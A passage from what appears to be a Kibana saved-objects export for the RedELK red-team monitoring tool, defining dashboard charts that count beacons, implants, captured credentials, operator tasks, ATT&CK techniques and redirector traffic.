"{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2249], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2251], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.2", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2253], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2255], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.2", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2257], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2259], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2261], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.2", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2264], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.2", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2266], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.2", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2268], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.2", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2270], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2272], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2274], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.2", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2276], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.2", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2278], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2280], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.2", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2282], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source 